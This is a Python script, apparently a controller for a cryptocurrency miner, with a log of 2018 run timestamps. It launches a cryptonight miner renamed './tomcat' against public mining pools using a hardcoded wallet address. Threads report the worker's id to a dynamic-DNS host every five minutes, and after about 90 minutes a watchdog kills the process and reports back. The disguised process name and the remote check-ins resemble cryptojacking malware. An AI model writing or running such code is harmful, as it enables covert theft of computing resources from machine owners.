import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:54:02.032111
#2018-02-17 16:39:06.917994
#2018-02-17 18:26:08.197989
#2018-02-17 20:17:01.515346
#2018-02-17 22:04:05.231010
#2018-02-17 23:48:04.342366
#2018-02-18 01:37:01.676904
#2018-02-18 03:24:01.383911
#2018-02-18 05:11:06.279644
#2018-02-18 07:03:04.690636
#2018-02-18 08:51:02.201097
#2018-02-18 10:38:01.912346
#2018-02-18 12:23:03.576344
#2018-02-18 14:11:07.303116
#2018-02-18 16:01:01.663150
#2018-02-18 17:50:09.127480
#2018-02-18 19:38:05.871545
#2018-02-18 21:23:04.106200
#2018-02-18 23:12:01.760702
#2018-02-19 00:58:05.469049
#2018-02-19 02:46:07.114123
#2018-02-19 04:32:06.423560
#2018-02-19 06:17:04.862857
#2018-02-19 08:05:04.255555
#2018-02-19 09:55:04.970476
#2018-02-19 11:43:08.457048
#2018-02-19 13:30:11.010522
#2018-02-19 15:20:09.912912
#2018-02-19 17:10:01.661062
#2018-02-19 18:59:06.096656
#2018-02-19 20:47:03.907821
#2018-02-19 22:34:05.516739
#2018-02-20 00:19:05.529930
#2018-02-20 02:07:04.409031
#2018-02-20 03:56:07.389888
#2018-02-20 05:39:05.090522
#2018-02-20 07:24:01.924451
#2018-02-20 09:10:08.449584
#2018-02-20 10:53:05.587722
#2018-02-20 12:41:01.325866
#2018-02-20 14:25:11.179951
#2018-02-20 16:11:10.223372
#2018-02-20 17:56:04.887102
#2018-02-20 19:47:01.711351
#2018-02-20 21:38:08.383473
#2018-02-20 23:19:05.468034
#2018-02-21 01:02:05.981709
#2018-02-21 02:49:01.788017
#2018-02-21 04:37:03.827795
#2018-02-21 06:24:06.790828
#2018-02-21 08:09:04.467201
#2018-02-21 09:56:05.646811
#2018-02-21 11:43:08.642576
#2018-02-21 13:33:01.459331
#2018-02-21 15:17:04.378855
#2018-02-21 17:07:08.497194
#2018-02-21 18:54:01.803891
#2018-02-21 20:44:09.951031
#2018-02-21 22:30:03.892941
#2018-02-22 00:20:01.408301
#2018-02-22 02:09:02.188250
#2018-02-22 03:54:07.054253
#2018-02-22 05:41:05.521133
#2018-02-22 07:27:05.107912
#2018-02-22 09:14:08.193844
#2018-02-22 11:02:07.191128
#2018-02-22 12:49:12.227168
#2018-02-22 14:34:01.439329
#2018-02-22 16:20:06.403911
#2018-02-22 18:06:05.978332
#2018-02-22 19:56:06.803140
#2018-02-22 21:46:02.156518
#2018-02-22 23:33:06.547097
#2018-02-23 01:21:05.066708
#2018-02-23 03:08:07.542347
#2018-02-23 04:55:03.702061
#2018-02-23 06:41:04.174219
#2018-02-23 08:31:06.456121
#2018-02-23 10:45:12.386629
#2018-02-23 12:44:11.738504
#2018-02-23 14:28:06.752226
#2018-02-23 16:18:07.284597
#2018-02-23 18:04:06.636706
#2018-02-23 19:49:03.758191
#2018-02-23 21:32:07.811004
#2018-02-23 23:20:08.499414
#2018-02-24 01:12:07.434662
#2018-02-24 03:04:04.047496
#2018-02-24 04:50:04.443179
#2018-02-24 06:35:03.204547
#2018-02-24 08:24:05.479506
#2018-02-24 10:11:04.999535
#2018-02-24 12:06:06.693663
#2018-02-24 13:54:05.371826
#2018-02-24 15:45:08.508830
#2018-02-24 18:00:07.948785
#2018-02-24 19:49:01.959784
#2018-02-24 21:33:07.602741
#2018-02-25 00:19:07.188612
#2018-02-25 04:13:01.307794
#2018-02-25 07:44:06.597093